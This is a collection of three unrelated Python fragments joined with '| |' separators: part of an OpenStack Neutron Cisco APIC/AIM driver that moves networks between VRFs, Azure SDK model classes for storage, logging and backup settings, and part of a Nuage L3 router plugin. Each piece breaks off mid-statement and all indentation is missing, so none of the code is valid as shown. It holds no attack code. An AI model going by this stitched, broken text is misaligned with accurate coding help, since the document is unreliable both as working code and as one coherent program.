# Just set unrouted VRF and disable routing.
bd = self.aim.update(aim_ctx, bd, enable_routing=False,
vrf_name=new_vrf.name)
# All non-router ports on this network need to be notified
# since their BD's VRF and possibly their BD's and EPG's
# Tenants have changed.
nets_to_notify.add(network_db.id)
def _move_topology(self, aim_ctx, topology, old_vrf, new_vrf,
nets_to_notify):
LOG.info(_LI("Moving routed networks %(topology)s from VRF "
"%(old_vrf)s to VRF %(new_vrf)s"),
{'topology': topology.keys(),
'old_vrf': old_vrf,
'new_vrf': new_vrf})
# TODO(rkukura): Validate that nothing in new_vrf overlaps
# with topology.
session = aim_ctx.db_session
for network_db in topology.itervalues():
if old_vrf.tenant_name != new_vrf.tenant_name:
# New VRF is in different Tenant, so move BD, EPG, and
# all Subnets to new VRF's Tenant and set BD's VRF.
LOG.debug("Moving network %(net)s from tenant %(old)s to "
"tenant %(new)s",
{'net': network_db.id,
'old': old_vrf.tenant_name,
'new': new_vrf.tenant_name})
bd, epg = self._map_network(session, network_db, old_vrf)
old_bd = self.aim.get(aim_ctx, bd)
new_bd = copy.copy(old_bd)
new_bd.tenant_name = new_vrf.tenant_name
new_bd.vrf_name = new_vrf.name
bd = self.aim.create(aim_ctx, new_bd)
for subnet in self.aim.find(
aim_ctx, aim_resource.Subnet,
tenant_name=old_bd.tenant_name, bd_name=old_bd.name):
self.aim.delete(aim_ctx, subnet)
subnet.tenant_name = bd.tenant_name
subnet = self.aim.create(aim_ctx, subnet)
self.aim.delete(aim_ctx, old_bd)
epg = self.aim.get(aim_ctx, epg)
self.aim.delete(aim_ctx, epg)
epg.tenant_name = new_vrf.tenant_name
epg = self.aim.create(aim_ctx, epg)
else:
# New VRF is in same Tenant, so just set BD's VRF.
bd, _ = self._map_network(session, network_db, new_vrf)
bd = self.aim.update(aim_ctx, bd, vrf_name=new_vrf.name)
# All non-router ports on all networks in topology need to be
# notified since their BDs' VRFs and possibly their BDs' and
# EPGs' Tenants have changed.
nets_to_notify.update(topology.keys())
def _router_topology(self, session, router_id):
LOG.debug("Getting topology for router %s", router_id)
visited_networks = {}
visited_router_ids = set()
self._expand_topology_for_routers(
session, visited_networks, visited_router_ids, [router_id])
LOG.debug("Returning router topology %s", visited_networks)
return visited_networks
def _network_topology(self, session, network_db):
LOG.debug("Getting topology for network %s", network_db.id)
visited_networks = {}
visited_router_ids = set()
self._expand_topology_for_networks(
session, visited_networks, visited_router_ids, [network_db])
LOG.debug("Returning network topology %s", visited_networks)
return visited_networks
def _expand_topology_for_routers(self, session, visited_networks,
visited_router_ids, new_router_ids):
LOG.debug("Adding routers %s to topology", new_router_ids)
added_ids = set(new_router_ids) - visited_router_ids
if added_ids:
visited_router_ids |= added_ids
LOG.debug("Querying for networks interfaced to routers %s",
added_ids)
query = (session.query(models_v2.Network).
join(models_v2.Port).
join(l3_db.RouterPort).
filter(l3_db.RouterPort.router_id.in_(added_ids)))
if visited_networks:
query = query.filter(
~models_v2.Network.id.in_(visited_networks.keys()))
results = (query.filter(l3_db.RouterPort.port_type ==
n_constants.DEVICE_OWNER_ROUTER_INTF).
distinct().
all())
self._expand_topology_for_networks(
session, visited_networks, visited_router_ids, results)
def _expand_topology_for_networks(self, session, visited_networks,
visited_router_ids, new_networks):
LOG.debug("Adding networks %s to topology",
[net.id for net in new_networks])
added_ids = []
for net in new_networks:
if net.id not in visited_networks:
visited_networks[net.id] = net
added_ids.append(net.id)
if added_ids:
LOG.debug("Querying for routers interfaced to networks %s",
added_ids)
query = (session.query(l3_db.RouterPort.router_id).
join(models_v2.Port).
filter(models_v2.Port.network_id.in_(added_ids)))
if visited_router_ids:
query = query.filter(
~l3_db.RouterPort.router_id.in_(visited_router_ids))
results = (query.filter(l3_db.RouterPort.port_type ==
n_constants.DEVICE_OWNER_ROUTER_INTF).
distinct().
all())
self._expand_topology_for_routers(
session, visited_networks, visited_router_ids,
[result[0] for result in results])
def _topology_shared(self, topology):
for network_db in topology.values():
for entry in network_db.rbac_entries:
# Access is enforced by Neutron itself, and we only
# care whether or not the network is shared, so we
# ignore the entry's target_tenant.
if entry.action == rbac_db_models.ACCESS_SHARED:
return network_db
def _ip_for_subnet(self, subnet, fixed_ips):
subnet_id = subnet['id']
for fixed_ip in fixed_ips:
if fixed_ip['subnet_id'] == subnet_id:
return fixed_ip['ip_address']
def _subnet_router_ips(self, session, subnet_id):
return (session.query(models_v2.IPAllocation.ip_address,
l3_db.RouterPort.router_id).
join(models_v2.Port).
filter(
models_v2.IPAllocation.subnet_id == subnet_id,
l3_db.RouterPort.port_type ==
n_constants.DEVICE_OWNER_ROUTER_INTF
))
def _scope_by_id(self, session, scope_id):
return (session.query(address_scope_db.AddressScope).
filter_by(id=scope_id).
one())
def _map_network(self, session, network, vrf, bd_only=False):
tenant_aname = (vrf.tenant_name
if vrf and vrf.tenant_name != COMMON_TENANT_NAME
else self.name_mapper.project(
session, network['tenant_id']))
id = network['id']
aname = self.name_mapper.network(session, id)
bd = aim_resource.BridgeDomain(tenant_name=tenant_aname,
name=aname)
if bd_only:
return bd
epg = aim_resource.EndpointGroup(tenant_name=tenant_aname,
app_profile_name=self.ap_name,
name=aname)
return bd, epg
def _map_external_network(self, session, network):
l3out, ext_net, ns = self._get_aim_nat_strategy(network)
if ext_net:
aim_ctx = aim_context.AimContext(db_session=session)
for o in (ns.get_l3outside_resources(aim_ctx, l3out) or []):
if isinstance(o, aim_resource.EndpointGroup):
return o
def _map_subnet(self, subnet, gw_ip, bd):
prefix_len = subnet['cidr'].split('/')[1]
gw_ip_mask = gw_ip + '/' + prefix_len
sn = aim_resource.Subnet(tenant_name=bd.tenant_name,
bd_name=bd.name,
gw_ip_mask=gw_ip_mask)
return sn
def _map_address_scope(self, session, scope):
id = scope['id']
extn_db = extension_db.ExtensionDbMixin()
scope_extn = extn_db.get_address_scope_extn_db(session, id)
if scope_extn and scope_extn.get(cisco_apic.VRF):
vrf = aim_resource.VRF.from_dn(scope_extn[cisco_apic.VRF])
else:
tenant_aname = self.name_mapper.project(
session, scope['tenant_id'])
aname = self.name_mapper.address_scope(session, id)
vrf = aim_resource.VRF(tenant_name=tenant_aname, name=aname)
return vrf
def _map_router(self, session, router, contract_only=False):
id = router['id']
aname = self.name_mapper.router(session, id)
contract = aim_resource.Contract(tenant_name=COMMON_TENANT_NAME,
name=aname)
if contract_only:
return contract
subject = aim_resource.ContractSubject(tenant_name=COMMON_TENANT_NAME,
contract_name=aname,
name=ROUTER_SUBJECT_NAME)
return contract, subject
def _map_default_vrf(self, session, network):
tenant_aname = self.name_mapper.project(session, network['tenant_id'])
vrf = aim_resource.VRF(tenant_name=tenant_aname,
name=DEFAULT_VRF_NAME)
return vrf
def _map_unrouted_vrf(self):
vrf = aim_resource.VRF(
tenant_name=COMMON_TENANT_NAME,
name=self.apic_system_id + '_' + UNROUTED_VRF_NAME)
return vrf
def _ensure_common_tenant(self, aim_ctx):
attrs = aim_resource.Tenant(name=COMMON_TENANT_NAME,
display_name=aim_utils.sanitize_display_name('CommonTenant'))
tenant = self.aim.get(aim_ctx, attrs)
if not tenant:
LOG.info(_LI("Creating common tenant"))
tenant = self.aim.create(aim_ctx, attrs)
return tenant
def _ensure_unrouted_vrf(self, aim_ctx):
self._ensure_common_tenant(aim_ctx)
attrs = self._map_unrouted_vrf()
vrf = self.aim.get(aim_ctx, attrs)
if not vrf:
attrs.display_name = (
aim_utils.sanitize_display_name('CommonUnroutedVRF'))
LOG.info(_LI("Creating common unrouted VRF"))
vrf = self.aim.create(aim_ctx, attrs)
return vrf
def _ensure_any_filter(self, aim_ctx):
self._ensure_common_tenant(aim_ctx)
filter_name = self.apic_system_id + '_' + ANY_FILTER_NAME
dname = aim_utils.sanitize_display_name("AnyFilter")
filter = aim_resource.Filter(tenant_name=COMMON_TENANT_NAME,
name=filter_name,
display_name=dname)
if not self.aim.get(aim_ctx, filter):
LOG.info(_LI("Creating common Any Filter"))
self.aim.create(aim_ctx, filter)
dname = aim_utils.sanitize_display_name("AnyFilterEntry")
entry = aim_resource.FilterEntry(tenant_name=COMMON_TENANT_NAME,
filter_name=filter_name,
name=ANY_FILTER_ENTRY_NAME,
display_name=dname)
if not self.aim.get(aim_ctx, entry):
LOG.info(_LI("Creating common Any FilterEntry"))
self.aim.create(aim_ctx, entry)
return filter
def _ensure_default_vrf(self, aim_ctx, attrs):
vrf = self.aim.get(aim_ctx, attrs)
if not vrf:
attrs.display_name = (
aim_utils.sanitize_display_name('DefaultRoutedVRF'))
LOG.info(_LI("Creating default VRF for %s"), attrs.tenant_name)
vrf = self.aim.create(aim_ctx, attrs)
return vrf
def _get_epg_for_network(self, session, network):
if self._is_external(network):
return self._map_external_network(session, network)
# REVISIT(rkukura): Can the network_db be passed in?
network_db = (session.query(models_v2.Network).
filter_by(id=network['id']).
one())
vrf = self._get_routed_vrf_for_network(session, network_db)
return self._map_network(session, network_db, vrf)[1]
# DB Configuration callbacks
def _set_enable_metadata_opt(self, new_conf):
self.enable_metadata_opt = new_conf['value']
def _set_enable_dhcp_opt(self, new_conf):
self.enable_dhcp_opt = new_conf['value']
def _set_ap_name(self, new_conf):
self.ap_name = new_conf['value']
def get_aim_domains(self, aim_ctx):
vmms = [x.name for x in self.aim.find(aim_ctx, aim_resource.VMMDomain)
if x.type == utils.OPENSTACK_VMM_TYPE]
phys = [x.name for x in
self.aim.find(aim_ctx, aim_resource.PhysicalDomain)]
return vmms, phys
def _is_external(self, network):
return network.get('router:external')
def _nat_type_to_strategy(self, nat_type):
ns_cls = nat_strategy.DistributedNatStrategy
if nat_type == '':
ns_cls = nat_strategy.NoNatStrategy
elif nat_type == 'edge':
ns_cls = nat_strategy.EdgeNatStrategy
ns = ns_cls(self.aim)
ns.app_profile_name = self.ap_name
return ns
def _get_aim_nat_strategy(self, network):
if not self._is_external(network):
return None, None, None
ext_net_dn = (network.get(cisco_apic.DIST_NAMES, {})
.get(cisco_apic.EXTERNAL_NETWORK))
if not ext_net_dn:
return None, None, None
nat_type = network.get(cisco_apic.NAT_TYPE)
aim_ext_net = aim_resource.ExternalNetwork.from_dn(ext_net_dn)
aim_l3out = aim_resource.L3Outside(
tenant_name=aim_ext_net.tenant_name, name=aim_ext_net.l3out_name)
return aim_l3out, aim_ext_net, self._nat_type_to_strategy(nat_type)
def _get_aim_nat_strategy_db(self, session, network_db):
if network_db.external is not None:
extn_db = extension_db.ExtensionDbMixin()
extn_info = extn_db.get_network_extn_db(session, network_db.id)
if extn_info and cisco_apic.EXTERNAL_NETWORK in extn_info:
dn | |
int
:param enabled: True if configuration is enabled, false if it is disabled and null if
configuration is not set.
:type enabled: bool
"""
_attribute_map = {
'sas_url': {'key': 'sasUrl', 'type': 'str'},
'retention_in_days': {'key': 'retentionInDays', 'type': 'int'},
'enabled': {'key': 'enabled', 'type': 'bool'},
}
def __init__(
self,
*,
sas_url: Optional[str] = None,
retention_in_days: Optional[int] = None,
enabled: Optional[bool] = None,
**kwargs
):
super(AzureBlobStorageHttpLogsConfig, self).__init__(**kwargs)
self.sas_url = sas_url
self.retention_in_days = retention_in_days
self.enabled = enabled
class AzureStorageInfoValue(msrest.serialization.Model):
"""Azure Files or Blob Storage access information value for dictionary storage.
Variables are only populated by the server, and will be ignored when sending a request.
:param type: Type of storage. Possible values include: "AzureFiles", "AzureBlob".
:type type: str or ~azure.mgmt.web.v2020_06_01.models.AzureStorageType
:param account_name: Name of the storage account.
:type account_name: str
:param share_name: Name of the file share (container name, for Blob storage).
:type share_name: str
:param access_key: Access key for the storage account.
:type access_key: str
:param mount_path: Path to mount the storage within the site's runtime environment.
:type mount_path: str
:ivar state: State of the storage account. Possible values include: "Ok", "InvalidCredentials",
"InvalidShare".
:vartype state: str or ~azure.mgmt.web.v2020_06_01.models.AzureStorageState
"""
_validation = {
'state': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'account_name': {'key': 'accountName', 'type': 'str'},
'share_name': {'key': 'shareName', 'type': 'str'},
'access_key': {'key': 'accessKey', 'type': 'str'},
'mount_path': {'key': 'mountPath', 'type': 'str'},
'state': {'key': 'state', 'type': 'str'},
}
def __init__(
self,
*,
type: Optional[Union[str, "AzureStorageType"]] = None,
account_name: Optional[str] = None,
share_name: Optional[str] = None,
access_key: Optional[str] = None,
mount_path: Optional[str] = None,
**kwargs
):
super(AzureStorageInfoValue, self).__init__(**kwargs)
self.type = type
self.account_name = account_name
self.share_name = share_name
self.access_key = access_key
self.mount_path = mount_path
self.state = None
class AzureStoragePropertyDictionaryResource(ProxyOnlyResource):
"""AzureStorageInfo dictionary resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param properties: Azure storage accounts.
:type properties: dict[str, ~azure.mgmt.web.v2020_06_01.models.AzureStorageInfoValue]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'properties': {'key': 'properties', 'type': '{AzureStorageInfoValue}'},
}
def __init__(
self,
*,
kind: Optional[str] = None,
properties: Optional[Dict[str, "AzureStorageInfoValue"]] = None,
**kwargs
):
super(AzureStoragePropertyDictionaryResource, self).__init__(kind=kind, **kwargs)
self.properties = properties
class AzureTableStorageApplicationLogsConfig(msrest.serialization.Model):
"""Application logs to Azure table storage configuration.
All required parameters must be populated in order to send to Azure.
:param level: Log level. Possible values include: "Off", "Verbose", "Information", "Warning",
"Error".
:type level: str or ~azure.mgmt.web.v2020_06_01.models.LogLevel
:param sas_url: Required. SAS URL to an Azure table with add/query/delete permissions.
:type sas_url: str
"""
_validation = {
'sas_url': {'required': True},
}
_attribute_map = {
'level': {'key': 'level', 'type': 'str'},
'sas_url': {'key': 'sasUrl', 'type': 'str'},
}
def __init__(
self,
*,
sas_url: str,
level: Optional[Union[str, "LogLevel"]] = None,
**kwargs
):
super(AzureTableStorageApplicationLogsConfig, self).__init__(**kwargs)
self.level = level
self.sas_url = sas_url
class BackupItem(ProxyOnlyResource):
"""Backup description.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:ivar backup_id: Id of the backup.
:vartype backup_id: int
:ivar storage_account_url: SAS URL for the storage account container which contains this
backup.
:vartype storage_account_url: str
:ivar blob_name: Name of the blob which contains data for this backup.
:vartype blob_name: str
:ivar name_properties_name: Name of this backup.
:vartype name_properties_name: str
:ivar status: Backup status. Possible values include: "InProgress", "Failed", "Succeeded",
"TimedOut", "Created", "Skipped", "PartiallySucceeded", "DeleteInProgress", "DeleteFailed",
"Deleted".
:vartype status: str or ~azure.mgmt.web.v2020_06_01.models.BackupItemStatus
:ivar size_in_bytes: Size of the backup in bytes.
:vartype size_in_bytes: long
:ivar created: Timestamp of the backup creation.
:vartype created: ~datetime.datetime
:ivar log: Details regarding this backup. Might contain an error message.
:vartype log: str
:ivar databases: List of databases included in the backup.
:vartype databases: list[~azure.mgmt.web.v2020_06_01.models.DatabaseBackupSetting]
:ivar scheduled: True if this backup has been created due to a schedule being triggered.
:vartype scheduled: bool
:ivar last_restore_time_stamp: Timestamp of a last restore operation which used this backup.
:vartype last_restore_time_stamp: ~datetime.datetime
:ivar finished_time_stamp: Timestamp when this backup finished.
:vartype finished_time_stamp: ~datetime.datetime
:ivar correlation_id: Unique correlation identifier. Please use this along with the timestamp
while communicating with Azure support.
:vartype correlation_id: str
:ivar website_size_in_bytes: Size of the original web app which has been backed up.
:vartype website_size_in_bytes: long
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'backup_id': {'readonly': True},
'storage_account_url': {'readonly': True},
'blob_name': {'readonly': True},
'name_properties_name': {'readonly': True},
'status': {'readonly': True},
'size_in_bytes': {'readonly': True},
'created': {'readonly': True},
'log': {'readonly': True},
'databases': {'readonly': True},
'scheduled': {'readonly': True},
'last_restore_time_stamp': {'readonly': True},
'finished_time_stamp': {'readonly': True},
'correlation_id': {'readonly': True},
'website_size_in_bytes': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'backup_id': {'key': 'properties.id', 'type': 'int'},
'storage_account_url': {'key': 'properties.storageAccountUrl', 'type': 'str'},
'blob_name': {'key': 'properties.blobName', 'type': 'str'},
'name_properties_name': {'key': 'properties.name', 'type': 'str'},
'status': {'key': 'properties.status', 'type': 'str'},
'size_in_bytes': {'key': 'properties.sizeInBytes', 'type': 'long'},
'created': {'key': 'properties.created', 'type': 'iso-8601'},
'log': {'key': 'properties.log', 'type': 'str'},
'databases': {'key': 'properties.databases', 'type': '[DatabaseBackupSetting]'},
'scheduled': {'key': 'properties.scheduled', 'type': 'bool'},
'last_restore_time_stamp': {'key': 'properties.lastRestoreTimeStamp', 'type': 'iso-8601'},
'finished_time_stamp': {'key': 'properties.finishedTimeStamp', 'type': 'iso-8601'},
'correlation_id': {'key': 'properties.correlationId', 'type': 'str'},
'website_size_in_bytes': {'key': 'properties.websiteSizeInBytes', 'type': 'long'},
}
def __init__(
self,
*,
kind: Optional[str] = None,
**kwargs
):
super(BackupItem, self).__init__(kind=kind, **kwargs)
self.backup_id = None
self.storage_account_url = None
self.blob_name = None
self.name_properties_name = None
self.status = None
self.size_in_bytes = None
self.created = None
self.log = None
self.databases = None
self.scheduled = None
self.last_restore_time_stamp = None
self.finished_time_stamp = None
self.correlation_id = None
self.website_size_in_bytes = None
class BackupItemCollection(msrest.serialization.Model):
"""Collection of backup items.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2020_06_01.models.BackupItem]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[BackupItem]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: List["BackupItem"],
**kwargs
):
super(BackupItemCollection, self).__init__(**kwargs)
self.value = value
self.next_link = None
class BackupRequest(ProxyOnlyResource):
"""Description of a backup which will be performed.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param backup_name: Name of the backup.
:type backup_name: str
:param enabled: True if the backup schedule is enabled (must be included in that case), false
if the backup schedule should be disabled.
:type enabled: bool
:param storage_account_url: SAS URL to the container.
:type storage_account_url: str
:param backup_schedule: Schedule for the backup if it is executed periodically.
:type backup_schedule: ~azure.mgmt.web.v2020_06_01.models.BackupSchedule
:param databases: Databases included in the backup.
:type databases: list[~azure.mgmt.web.v2020_06_01.models.DatabaseBackupSetting]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'backup_name': {'key': 'properties.backupName', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'storage_account_url': {'key': 'properties.storageAccountUrl', 'type': 'str'},
'backup_schedule': {'key': 'properties.backupSchedule', 'type': 'BackupSchedule'},
'databases': {'key': 'properties.databases', 'type': '[DatabaseBackupSetting]'},
}
def __init__(
self,
*,
kind: Optional[str] = None,
backup_name: Optional[str] = None,
enabled: Optional[bool] = None,
storage_account_url: Optional[str] = None,
backup_schedule: Optional["BackupSchedule"] = None,
databases: Optional[List["DatabaseBackupSetting"]] = None,
**kwargs
):
super(BackupRequest, self).__init__(kind=kind, **kwargs)
self.backup_name = backup_name
self.enabled = enabled
self.storage_account_url = storage_account_url
self.backup_schedule = backup_schedule
self.databases = databases
class BackupSchedule(msrest.serialization.Model):
"""Description of a backup schedule. Describes how often should be the backup performed and what should | |
= ipv6_dhcp_ip = None
if dhcp_port:
on_exc(self.delete_dhcp_nuage_port_by_id, context,
dhcp_port['id'])
for fixed_ip in dhcp_port['fixed_ips']:
if (ipv4_subnet and
fixed_ip['subnet_id'] == ipv4_subnet['id']):
ipv4_dhcp_ip = fixed_ip['ip_address']
if (ipv6_subnet and
fixed_ip['subnet_id'] == ipv6_subnet['id']):
ipv6_dhcp_ip = fixed_ip['ip_address']
self.vsdclient.confirm_router_interface_not_in_use(router_id,
subnet)
network = self.core_plugin.get_network(context,
subnet['network_id'])
subnet_mapping['network_name'] = network['name']
with session.begin(subtransactions=True):
vsd_l2domain = (
self.vsdclient.create_l2domain_for_router_detach(
ipv4_subnet, subnet_mapping, ipv6_subnet, ipv4_dhcp_ip,
ipv6_dhcp_ip))
on_exc(self.vsdclient.delete_subnet,
l2dom_id=vsd_l2domain['nuage_l2domain_id'])
result = super(NuageL3Plugin,
self).remove_router_interface(context, router_id,
interface_info)
self.set_mapping_as_l2domain(session,
ipv4_subnet_mapping,
ipv6_subnet_mapping,
vsd_l2domain)
self.vsdclient.move_l3subnet_to_l2domain(
nuage_subn_id,
vsd_l2domain['nuage_l2domain_id'],
ipv4_subnet_mapping,
subnet,
ipv6_subnet_mapping
)
self._notify_add_del_router_interface(
constants.AFTER_DELETE,
context=context,
router_id=router_id,
subnet_id=subnet_id,
subnet_mapping=subnet_mapping)
routing_mechanisms.delete_nuage_subnet_parameters(context,
subnet_id)
LOG.debug("Deleted nuage domain subnet %s", nuage_subn_id)
return result
@staticmethod
def set_mapping_as_l3subnet(session, ipv4_subnet_mapping,
ipv6_subnet_mapping, vsd_subnet):
with session.begin(subtransactions=True):
if ipv4_subnet_mapping:
nuagedb.update_subnetl2dom_mapping(
ipv4_subnet_mapping,
{'nuage_subnet_id': vsd_subnet['ID'],
'nuage_l2dom_tmplt_id': None})
if ipv6_subnet_mapping:
nuagedb.update_subnetl2dom_mapping(
ipv6_subnet_mapping,
{'nuage_subnet_id': vsd_subnet['ID'],
'nuage_l2dom_tmplt_id': None})
@nuage_utils.handle_nuage_api_error
@lib_db_api.retry_if_session_inactive()
@log_helpers.log_method_call
def get_router(self, context, id, fields=None):
router = super(NuageL3Plugin, self).get_router(context, id, fields)
nuage_router = self.vsdclient.get_router_by_external(id)
self._add_nuage_router_attributes(context.session, router,
nuage_router)
return self._fields(router, fields)
@nuage_utils.handle_nuage_api_error
@lib_db_api.retry_if_session_inactive()
@log_helpers.log_method_call
def get_routers(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
routers = super(NuageL3Plugin, self).get_routers(context, filters,
fields, sorts, limit,
marker, page_reverse)
for router in routers:
routing_mechanisms.add_nuage_router_attributes(context.session,
router)
self._fields(router, fields)
return routers
def _add_nuage_router_attributes(self, session, router, nuage_router):
if not nuage_router:
return
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(
session, router['id'])
router['net_partition'] = ent_rtr_mapping['net_partition_id']
router['tunnel_type'] = nuage_router.get('tunnelType')
router['rd'] = nuage_router.get('routeDistinguisher')
router['rt'] = nuage_router.get('routeTarget')
router['ecmp_count'] = nuage_router.get('ECMPCount')
router['nuage_backhaul_vnid'] = nuage_router.get('backHaulVNID')
router['nuage_backhaul_rd'] = (nuage_router.get(
'backHaulRouteDistinguisher'))
router['nuage_backhaul_rt'] = nuage_router.get('backHaulRouteTarget')
for route in router.get('routes', []):
params = {
'address': route['destination'],
'nexthop': route['nexthop'],
'nuage_domain_id': nuage_router['ID']
}
nuage_route = self.vsdclient.get_nuage_static_route(params)
if nuage_route:
route['rd'] = nuage_route['rd']
routing_mechanisms.add_nuage_router_attributes(session, router)
@nuage_utils.handle_nuage_api_error
@lib_db_api.retry_if_session_inactive()
@log_helpers.log_method_call
def create_router(self, context, router):
routing_mechanisms.update_routing_values(router['router'])
req_router = copy.deepcopy(router['router'])
net_partition = self._get_net_partition_for_entity(
context, router['router'])
self._validate_create_router(context, net_partition['name'], router)
neutron_router = super(NuageL3Plugin, self).create_router(context,
router)
nuage_router = None
try:
nuage_router = self.vsdclient.create_l3domain(
neutron_router, req_router, net_partition, context.tenant_name)
except Exception:
with excutils.save_and_reraise_exception():
super(NuageL3Plugin, self).delete_router(
context, neutron_router['id'])
if nuage_router:
LOG.debug("Created nuage domain %s", nuage_router[
'nuage_domain_id'])
with context.session.begin(subtransactions=True):
nuagedb.add_entrouter_mapping(context.session,
net_partition['id'],
neutron_router['id'],
nuage_router['nuage_domain_id'],
nuage_router['rt'],
nuage_router['rd'])
neutron_router['net_partition'] = net_partition['id']
neutron_router['rd'] = nuage_router['rd']
neutron_router['rt'] = nuage_router['rt']
neutron_router['nuage_backhaul_vnid'] = \
nuage_router['nuage_backhaul_vnid']
neutron_router['nuage_backhaul_rd'] = \
nuage_router['nuage_backhaul_rd']
neutron_router['nuage_backhaul_rt'] = \
nuage_router['nuage_backhaul_rt']
neutron_router['nuage_router_template'] = \
nuage_router['nuage_template_id']
neutron_router['tunnel_type'] = nuage_router['tunnel_type']
neutron_router['ecmp_count'] = nuage_router['ecmp_count']
routing_mechanisms.update_nuage_router_parameters(
req_router, context, neutron_router['id']
)
# adds Nuage_underlay attribute to neutron_router
routing_mechanisms.add_nuage_router_attributes(context.session,
neutron_router)
return neutron_router
def _validate_create_router(self, context, netpart_name, router):
if netpart_name == constants.SHARED_INFRASTRUCTURE:
msg = _("It is not allowed to create routers in "
"the net_partition {}").format(netpart_name)
raise n_exc.BadRequest(resource='router', msg=msg)
if 'ecmp_count' in router and not context.is_admin:
msg = _("ecmp_count can only be set by an admin user.")
raise nuage_exc.NuageNotAuthorized(resource='router', msg=msg)
@nuage_utils.handle_nuage_api_error
@lib_db_api.retry_if_session_inactive()
@log_helpers.log_method_call
def update_router(self, context, id, router):
updates = router['router']
original_router = self.get_router(context, id)
self._validate_update_router(context, id, updates)
routing_mechanisms.update_routing_values(updates, original_router)
ent_rtr_mapping = context.ent_rtr_mapping
nuage_domain_id = ent_rtr_mapping['nuage_router_id']
curr_router = self.get_router(context, id)
old_routes = self._get_extra_routes_by_router_id(context, id)
# Replace routes in curr_router with old_routes as the curr_router
# contains also rd which disrupts rollback
original_router['routes'] = old_routes
with nuage_utils.rollback() as on_exc:
router_updated = super(NuageL3Plugin, self).update_router(
context,
id,
copy.deepcopy(router))
on_exc(super(NuageL3Plugin, self).update_router,
context,
id,
{'router': copy.deepcopy(original_router)})
if 'routes' in updates:
self._update_nuage_router_static_routes(id,
nuage_domain_id,
old_routes,
updates['routes'])
on_exc(self._update_nuage_router_static_routes, id,
nuage_domain_id, updates['routes'], old_routes)
if 'routes' in updates and len(updates) == 1:
pass
else:
self._update_nuage_router(nuage_domain_id, curr_router,
updates,
ent_rtr_mapping)
on_exc(self._update_nuage_router, nuage_domain_id, updates,
curr_router, ent_rtr_mapping)
nuage_router = self.vsdclient.get_router_by_external(id)
self._add_nuage_router_attributes(context.session,
router_updated, nuage_router)
routing_mechanisms.update_nuage_router_parameters(
updates, context, curr_router['id'])
on_exc(routing_mechanisms.update_nuage_router_parameters,
original_router, context, original_router['id'])
rollbacks = []
try:
self.nuage_callbacks.notify(
resources.ROUTER, constants.AFTER_UPDATE, self,
context=context, updated_router=router_updated,
original_router=original_router,
request_router=updates, domain=nuage_router,
rollbacks=rollbacks)
except Exception:
with excutils.save_and_reraise_exception():
for rollback in reversed(rollbacks):
rollback[0](*rollback[1], **rollback[2])
routing_mechanisms.add_nuage_router_attributes(context.session,
router_updated)
return router_updated
def _validate_update_router(self, context, id, router):
if 'ecmp_count' in router and not context.is_admin:
msg = _("ecmp_count can only be set by an admin user.")
raise nuage_exc.NuageNotAuthorized(resource='router', msg=msg)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(context.session,
id)
if not ent_rtr_mapping:
msg = (_("Router %s does not hold net-partition "
"assoc on VSD. extra-route failed") % id)
raise n_exc.BadRequest(resource='router', msg=msg)
context.ent_rtr_mapping = ent_rtr_mapping
def _update_nuage_router_static_routes(self, id, nuage_domain_id,
old_routes, new_routes):
added, removed = helpers.diff_list_of_dict(old_routes, new_routes)
routes_removed = []
routes_added = []
try:
for route in removed:
self._delete_nuage_static_route(nuage_domain_id, route)
routes_removed.append(route)
for route in added:
self._add_nuage_static_route(id, nuage_domain_id, route)
routes_added.append(route)
except Exception as e:
for route in routes_added:
self._delete_nuage_static_route(nuage_domain_id, route)
for route in routes_removed:
self._add_nuage_static_route(id, nuage_domain_id, route)
raise e
def _add_nuage_static_route(self, router_id, nuage_domain_id, route):
params = {
'nuage_domain_id': nuage_domain_id,
'neutron_rtr_id': router_id,
'net': netaddr.IPNetwork(route['destination']),
'nexthop': route['nexthop']
}
self.vsdclient.create_nuage_staticroute(params)
def _delete_nuage_static_route(self, nuage_domain_id, route):
params = {
"address": route['destination'],
"nexthop": route['nexthop'],
"nuage_domain_id": nuage_domain_id
}
self.vsdclient.delete_nuage_staticroute(params)
def _update_nuage_router(self, nuage_id, curr_router, router_updates,
ent_rtr_mapping):
curr_router.update(router_updates)
self.vsdclient.update_router(nuage_id, curr_router, router_updates)
ns_dict = {
'nuage_rtr_rt':
router_updates.get('rt', ent_rtr_mapping.get('nuage_rtr_rt')),
'nuage_rtr_rd':
